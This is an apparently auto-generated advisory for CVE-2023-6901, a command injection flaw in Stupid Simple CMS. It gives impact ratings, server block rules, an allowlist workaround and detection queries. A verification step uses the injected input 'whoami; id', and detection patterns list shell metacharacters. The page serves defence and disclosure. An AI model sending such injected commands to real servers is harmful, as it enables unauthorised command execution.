CVE-2023-6901 – This is a critical OS command injection vulnera... (How to Fix)

Q: What is the severity of CVE-2023-6901?

CVE-2023-6901 has a CVSS score of 7.3 (HIGH). This is a critical OS command injection vulnerability in Stupid Simple CMS that allows remote attackers to execute arbitrary commands on the server. Attackers can exploit this by sending specially crafted HTTP POST requests to the /terminal/handle-command.php endpoint. All users running Stupid Simple CMS version 1.2.3 or earlier are affected.

📋 TL;DR

This is a critical OS command injection vulnerability in Stupid Simple CMS that allows remote attackers to execute arbitrary commands on the server. Attackers can exploit this by sending specially crafted HTTP POST requests to the /terminal/handle-command.php endpoint. All users running Stupid Simple CMS version 1.2.3 or earlier are affected.

💻 Affected Systems

Products:

codelyfe Stupid Simple CMS

Versions: up to and including 1.2.3

Operating Systems: All operating systems running PHP

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default installation when the /terminal/handle-command.php endpoint is accessible.

📦 What is this software?

Stupid Simple Cms by Codelyfe

View all CVEs affecting Stupid Simple Cms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to execute arbitrary commands as the web server user, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.

🟠

Likely Case

Attackers gain shell access to the server, allowing them to read sensitive files, modify website content, or use the server as a pivot point for further attacks.

🟢

If Mitigated

Attack is blocked at the network perimeter or web application firewall, preventing command execution but potentially revealing the vulnerability through failed attempts.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable via HTTP POST requests without authentication, making internet-facing instances extremely vulnerable.

🏢 Internal Only: HIGH - Even internal instances are vulnerable to authenticated or unauthenticated attackers who can reach the web interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public proof-of-concept demonstrates exploitation with simple curl commands. The vulnerability requires no authentication and has straightforward exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Consider upgrading to a newer version if available, or implement workarounds and consider alternative CMS solutions.

🔧 Temporary Workarounds

Block vulnerable endpoint

all

Restrict access to /terminal/handle-command.php using web server configuration or firewall rules

# Apache: Add to .htaccess or virtual host config
<Files "handle-command.php">
    Order deny,allow
    Deny from all
</Files>
# Nginx: Add to server block
location ~ /terminal/handle-command\.php$ {
    deny all;
    return 403;
}

Input validation and sanitization

all

Implement strict input validation for the 'command' parameter to only allow expected values

# Example PHP code to add to handle-command.php
$allowed_commands = ['ls', 'pwd', 'whoami'];
if (!in_array($_POST['command'], $allowed_commands)) {
    die('Invalid command');
}

🧯 If You Can't Patch

Implement a web application firewall (WAF) with command injection protection rules
Network segmentation to isolate the CMS server from sensitive systems

🔍 How to Verify

Check if Vulnerable:

Test by sending a POST request to /terminal/handle-command.php with command parameter containing OS commands like 'whoami; id'

Check Version:

Check CMS version in admin panel or look for version files in installation directory

Verify Fix Applied:

Attempt the same exploit after implementing workarounds - should receive 403 error or validation failure

📡 Detection & Monitoring

Log Indicators:

POST requests to /terminal/handle-command.php containing shell metacharacters (;, |, &, $)
Unusual command execution in web server logs
Multiple failed attempts to access the vulnerable endpoint

Network Indicators:

HTTP POST requests to /terminal/handle-command.php with command parameter containing shell commands
Unusual outbound connections from web server to command and control servers

SIEM Query:

source="web_server" AND (url="/terminal/handle-command.php" OR command="*;*" OR command="*|*" OR command="*&*")

📊 Metadata

CVE ID: CVE-2023-6901

CVSS v3 Score: 7.3 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-78

Published: December 17, 2023

Last Updated: November 21, 2024

🔗 References

https://github.com/g1an123/POC/blob/main/README.md Exploit,Third Party Advisory
https://vuldb.com/?ctiid.248259 Permissions Required
https://vuldb.com/?id.248259 Permissions Required
https://github.com/g1an123/POC/blob/main/README.md Exploit,Third Party Advisory
https://vuldb.com/?ctiid.248259 Permissions Required
https://vuldb.com/?id.248259 Permissions Required

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-6901, you might also want to check these: